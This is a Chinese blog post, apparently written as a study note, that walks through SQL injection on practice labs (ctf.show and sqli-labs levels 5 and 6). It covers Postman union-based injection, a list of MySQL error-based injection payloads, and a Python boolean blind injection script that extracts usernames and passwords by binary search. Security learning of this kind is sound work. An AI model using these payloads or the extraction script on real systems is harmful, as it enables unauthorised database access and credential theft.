<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon.ico >
    <title>
        Hexo
    </title>
    <meta name="description" content= 嘿，我是刘训灼～这是我的子站，用于展示写的Hexo主题：Coder。欢迎访问！ >
    <meta name="keywords" content= Blog,Hexo,Theme,刘训灼,LiuXunzhuo >
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.0.0"></head>
<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            使用postman注入和布尔盲注
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h2 id="一、postman的使用："><a href="#一、postman的使用：" class="headerlink" title="一、postman的使用："></a>一、postman的使用：</h2><p>1.在物理机的火狐浏览器上面查找<a target="_blank" rel="noopener" href="http://2bedbecd-56d1-426b-a35a-4b49deea4522.challenge.ctf.show/">http://2bedbecd-56d1-426b-a35a-4b49deea4522.challenge.ctf.show/</a>，打开之后图片为<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251203148.png" alt="image.png"><br>2.按下F12，点击网络与重新加载，找到API，即名字为v3.php?page&#x3D;1&amp;limit&#x3D;10的文件，复制右边栏GET请求的网址，粘贴到postman的发包框内并且选择对应的请求。<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251203137.png" alt="image.png"><br>3.在前面两行已经有page和limit，在表格第三行输入id和1，点击send,查询到了id&#x3D;1的用户名和密码。然后找闭合点，在1的后面加单引号，再点击send,发现底栏报错，说明1’是闭合点<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251203714.png" alt="image.png"><br>接着在1’后面输入order by – -查看列数，当输入到3时，发现能够正常输出，输入为4时为空，说明没有4列。<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251203770.png" alt="image.png"><br>5.查字段名，把1改成-1，在表格1’后面使用union联合sql语句,和之前的报错型的步骤基本相同<br>-1’ union select 1,group_concat(column_name) ,3 from information_schema.columns where table_name&#x3D;’ctfshow_user3’ and table_schema&#x3D;database();– -<br>6.查字段，在表格1’后面使用union联合sql语句。-1’ union select 1,2,group_concat(id,”<del>“,username,”</del>“,password) from ctfshow_user3 ;– -<br>此时这么输入结果为空。<br>因为我们要的得到的是username&#x3D;’flag’的密码，所以要删除username,最终为-1’ union select 1,2,group_concat(id,”<del>“,username,”</del>“,password) from ctfshow_user3 ;– -<br>其实这里差三个·数据也是可以的，但是为什么没有查出来呢，因为在回显的时候进行了处理导致后台接收到了三个数据，回显只有两个。<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251203229.png" alt="69891f6cca6fb68e7013742b48bce68.png"></p>
<h2 id="二、报错："><a href="#二、报错：" class="headerlink" title="二、报错："></a>二、报错：</h2><p>原理：<br>通常利用恶意构造的SQL语句触发数据库执行错误，并通过捕获这些错误信息来获取所需的数据。<br>常见的报错函数：注意每次使用前面需要加and</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> (<span class="title function_ invoke__">extractvalue</span>(<span class="number">1</span>,<span class="title function_ invoke__">concat</span>(<span class="number">0x7e</span>,(select <span class="title function_ invoke__">user</span>()),<span class="number">0x7e</span>)))-- -</span><br><span class="line">(select <span class="number">1</span> <span class="keyword">from</span> (select <span class="title function_ invoke__">count</span>(*),<span class="title function_ invoke__">concat</span>(<span class="title function_ invoke__">user</span>(),<span class="title function_ invoke__">floor</span>(<span class="title function_ invoke__">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables group by x)a)</span><br><span class="line">(<span class="title function_ invoke__">updatexml</span>(<span class="number">1</span>,<span class="title function_ invoke__">concat</span>(<span class="number">0x7e</span>,(select <span class="title function_ invoke__">user</span>()),<span class="number">0x7e</span>),<span class="number">1</span>))</span><br><span class="line"><span class="title function_ invoke__">geometrycollection</span>((select * <span class="keyword">from</span>(select * <span class="keyword">from</span>(select <span class="title function_ invoke__">user</span>())a)b))</span><br><span class="line"><span class="title function_ invoke__">multipoint</span>((select * <span class="keyword">from</span>(select * <span class="keyword">from</span>(select <span class="title function_ invoke__">user</span>())a)b))</span><br><span class="line"><span class="title function_ invoke__">polygon</span>((select * <span class="keyword">from</span>(select * <span class="keyword">from</span>(select <span class="title function_ invoke__">user</span>())a)b)) </span><br><span class="line"><span class="title function_ invoke__">multipolygon</span>((select * <span class="keyword">from</span>(select * <span class="keyword">from</span>(select <span class="title function_ invoke__">user</span>())a)b))</span><br><span class="line"><span class="title function_ invoke__">linestring</span>((select * <span class="keyword">from</span>(select * <span class="keyword">from</span>(select <span class="title function_ invoke__">user</span>())a)b))</span><br><span class="line"><span class="title function_ invoke__">exp</span>(~(select * <span class="keyword">from</span>(select <span class="title function_ invoke__">user</span>())a)) </span><br></pre></td></tr></table></figure>

<p>这里报错以第五关为例，输入正确时输出You are in……..,错误时报错。也就是说此时的情况就是在输入正确时不再会显示数据库的相关信息了，对于第五关而言，可以用报错或者布尔盲注。<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251203132.png" alt="image.png"><br>查看第五关的代码发现：正确会输出You are in…….，没有回显，错误就输出sql报错。<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251203512.png" alt="image.png"><br>第五关解法：<br>报错，先找到闭合点，然后进行报错处理，将select user()或者user()换成自己需要的语句就可以了。<br><img src="https://cdn.nlark.com/yuque/0/2023/png/40666686/1703332481311-2b0f6c5b-9292-4dc8-af8c-81e062ed64d9.png#averageHue=%235d5c5a&clientId=ud7f03e37-d5ba-4&from=paste&height=610&id=u144976f6&originHeight=762&originWidth=1887&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=343365&status=done&style=none&taskId=uc5e32c73-a7be-48bc-9d78-f7383364e59&title=&width=1509.6" alt="image.png"><br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251203433.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251203282.png" alt="image.png"></p>
<p>如上图所示，查找了users表中的id，当用第一个函数查找username时报错，用updatexml就不会报错但是也只是显示了一部分，也就是说报错的函数不支持太长的字段，每一种报错回显的方法不同所展示的字段也会不同，同时也会受到mysql版本以及其他因素的影响而产生不了结果。</p>
<h2 id="三、布尔盲注："><a href="#三、布尔盲注：" class="headerlink" title="三、布尔盲注："></a>三、布尔盲注：</h2><p>在讲布尔盲注之前讲解了sql注入的基本内容：<br>1.sql注入是什么？<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251203794.png" alt="image.png"><br>2.sql注入的危害：<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204874.png" alt="image.png"><br>3.sql注入的分类：<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204400.png" alt="image.png"><br>4.mysql常见的内置函数：<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204852.png" alt="image.png"><br>可以用select函数进行拼接展示想要的结果。<br>5.sql Injection函数：<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204891.png" alt="image.png"><br>6.sql的注释：<br><img src="https://cdn.nlark.com/yuque/0/2023/png/40666686/1703333744680-0b8e20f2-9a5c-4f54-bb92-719c20772b91.png#averageHue=%23c7c7c7&clientId=ud7f03e37-d5ba-4&from=paste&height=306&id=udfcf8b72&originHeight=382&originWidth=692&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=1059550&status=done&style=none&taskId=ueb0365ab-94e5-4c1e-a145-f75534d26b2&title=&width=553.6" alt="image.png"><br>7.information_schema库的相关信息<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204219.png" alt="image.png"><br>8.union联合查询的方法：<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204558.png" alt="image.png"><br>正题：<br>布尔盲注是什么？<br>      SQL中的布尔盲注（Boolean-based Blind SQL Injection）是一种利用布尔逻辑（Boolean logic）来进行盲注（Blind Injection）攻击的技术。盲注是指攻击者无法直接获取数据库错误信息的情况下，通过观察应用程序的不同行为来推断数据库中的信息。布尔盲注是盲注攻击中的一种形式，它利用布尔逻辑的真与假来推断数据库中数据的情况。<br>       在布尔盲注攻击中，攻击者通过构造恶意的SQL语句来判断某个条件的真假，并观察应用程序的不同行为以推断数据库中的信息。攻击者通常会利用条件语句（如 WHERE 子句）中的布尔逻辑来推断数据库中存在的数据。攻击者通过不断尝试不同的条件，观察应用程序在条件为真和条件为假时的行为差异，从而逐步推断数据库中的数据信息。<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204796.png" alt="image.png"></p>
<p>sql注入中的布尔盲注需要有一定的python基础，布尔注入可以在以下情况下使用：</p>
<ol>
<li>验证时的布尔注入：应用程序在验证用户提供的输入时，通过布尔逻辑来判断输入是否有效。如果输入被用于构造SQL查询并没有正确的过滤，攻击者可以利用布尔注入来绕过验证机制。</li>
<li>布尔型条件查询的注入：应用程序根据某些条件进行查询，并根据查询结果的真假来决定下一步的行为。如果应用程序在构造查询条件时没有正确过滤用户提供的输入，攻击者可以利用布尔注入来改变查询条件的真假，从而影响应用程序的行为。</li>
<li>布尔型错误处理的注入：当应用程序发生错误时，有些应用程序会根据错误是否发生来执行不同的操作。如果应用程序在处理错误时没有正确过滤用户提供的输入，攻击者可以利用布尔注入来影响错误处理流程，可能导致泄露敏感的信息。</li>
</ol>
<p>此次python代码采用的是二分法，要对编码比较熟悉，从32到128进行二分法，提高效率，如果一个个去进行判断将会导致python的运行效率太低。<br>代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">session = requests.<span class="title function_ invoke__">session</span>()</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://192.168.2.110/sqli/Less-6/?id=1&quot;&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def <span class="title function_ invoke__">db</span>():</span><br><span class="line">    name = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i in <span class="title function_ invoke__">range</span>(<span class="number">1</span>,<span class="number">150</span>):</span><br><span class="line">        begin = <span class="number">32</span></span><br><span class="line">        end = <span class="number">128</span></span><br><span class="line">        tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">        <span class="keyword">while</span> begin &lt; end:</span><br><span class="line">            paramsGet = url + <span class="string">&quot;/**/and/**/ascii(substring((select group_concat(id,username,password) from users),&#123;0&#125;,1))&gt;&#123;1&#125;--+&quot;</span>.<span class="title function_ invoke__">format</span>(</span><br><span class="line">                i, tmp)</span><br><span class="line">            response = session.<span class="title function_ invoke__">get</span>(paramsGet)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;You are in...........&#x27;</span> in response.text:</span><br><span class="line">                begin = tmp + <span class="number">1</span></span><br><span class="line">                tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                end = tmp</span><br><span class="line">                tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">        <span class="keyword">if</span> tmp == <span class="number">32</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        name += <span class="title function_ invoke__">chr</span>(tmp)</span><br><span class="line">        <span class="keyword">print</span>(name)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">db</span>()</span><br></pre></td></tr></table></figure>

<p>能够正常运行的前提是导入了requests模块。<br>这里以第六关进行示范：<br>第六关的闭合点是双引号，直接在url上面进行修改：<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204685.png" alt="image.png"><br>在paramGet后面的substring里面输入想要查询的字段，在if里面输入正确时的回显信息<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204546.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204717.png" alt="image.png"><br>运行以下查看结果：<br><img src="https://raw.githubusercontent.com/dks2757/tu/main/img/202312251204661.png" alt="image.png"><br>以下是常用的python文件，仅供参考。<br><a target="_blank" rel="noopener" href="https://www.yuque.com/attachments/yuque/0/2023/py/40666686/1703335671306-8975b2b0-a087-4829-854c-70b9ad3dbede.py?_lake_card=%7B%22src%22:%22https://www.yuque.com/attachments/yuque/0/2023/py/40666686/1703335671306-8975b2b0-a087-4829-854c-70b9ad3dbede.py%22,%22name%22:%22%E7%88%86%E6%95%B0%E6%8D%AE%E5%BA%93.py%22,%22size%22:912,%22ext%22:%22py%22,%22source%22:%22%22,%22status%22:%22done%22,%22download%22:true,%22taskId%22:%22u55c0cc3f-c59b-409a-9d32-35351fdb404%22,%22taskType%22:%22upload%22,%22type%22:%22text/x-python%22,%22__spacing%22:%22both%22,%22id%22:%22u4688eb47%22,%22margin%22:%7B%22top%22:true,%22bottom%22:true%7D,%22card%22:%22file%22%7D">爆数据库.py</a><br><a target="_blank" rel="noopener" href="https://www.yuque.com/attachments/yuque/0/2023/py/40666686/1703335692120-ec8ade9b-573f-48d2-8f6c-4895a27a0ec3.py?_lake_card=%7B%22src%22:%22https://www.yuque.com/attachments/yuque/0/2023/py/40666686/1703335692120-ec8ade9b-573f-48d2-8f6c-4895a27a0ec3.py%22,%22name%22:%22%E7%88%86%E8%A1%A8.py%22,%22size%22:828,%22ext%22:%22py%22,%22source%22:%22%22,%22status%22:%22done%22,%22download%22:true,%22taskId%22:%22u33fa9094-22ee-4302-a3da-b2f4246f657%22,%22taskType%22:%22upload%22,%22type%22:%22text/x-python%22,%22__spacing%22:%22both%22,%22id%22:%22u9198c3ea%22,%22margin%22:%7B%22top%22:true,%22bottom%22:true%7D,%22card%22:%22file%22%7D">爆表.py</a><br><a target="_blank" rel="noopener" href="https://www.yuque.com/attachments/yuque/0/2023/py/40666686/1703335703391-c034745a-1904-47c7-85b4-cd73c4efe4c9.py?_lake_card=%7B%22src%22:%22https://www.yuque.com/attachments/yuque/0/2023/py/40666686/1703335703391-c034745a-1904-47c7-85b4-cd73c4efe4c9.py%22,%22name%22:%22%E7%88%86%E5%AD%97%E6%AE%B5.py%22,%22size%22:836,%22ext%22:%22py%22,%22source%22:%22%22,%22status%22:%22done%22,%22download%22:true,%22taskId%22:%22ubbe999b3-4485-4d9d-b710-51ad0ea8b25%22,%22taskType%22:%22upload%22,%22type%22:%22text/x-python%22,%22__spacing%22:%22both%22,%22id%22:%22u37747325%22,%22margin%22:%7B%22top%22:true,%22bottom%22:true%7D,%22card%22:%22file%22%7D">爆字段.py</a><br><a target="_blank" rel="noopener" href="https://www.yuque.com/attachments/yuque/0/2023/py/40666686/1703335713715-fd287cbe-0753-4994-a16e-1f58a7b720e6.py?_lake_card=%7B%22src%22:%22https://www.yuque.com/attachments/yuque/0/2023/py/40666686/1703335713715-fd287cbe-0753-4994-a16e-1f58a7b720e6.py%22,%22name%22:%22%E7%88%86%E5%80%BC.py%22,%22size%22:789,%22ext%22:%22py%22,%22source%22:%22%22,%22status%22:%22done%22,%22download%22:true,%22taskId%22:%22ub46d306d-2267-4448-a065-09e1b9a0578%22,%22taskType%22:%22upload%22,%22type%22:%22text/x-python%22,%22__spacing%22:%22both%22,%22id%22:%22uc1fe6b26%22,%22margin%22:%7B%22top%22:true,%22bottom%22:true%7D,%22card%22:%22file%22%7D">爆值.py</a></p>

    </div>

    
        <hr class="fhr">
        <div id="vcomments"></div>
    
</div>
    <div class="footer" id="footer">
    <p><h4>Copyright © 2020 | Author: Your Name | Theme By <a class="theme-author" target="_blank" rel="noopener" href="https://github.com/Xunzhuo/hexo-theme-coder" style="font-size:14px; color: #969696">Coder</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">Page Views: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">Unique Visitors: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="">
<input type="hidden" id="valine_appKey" value="">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
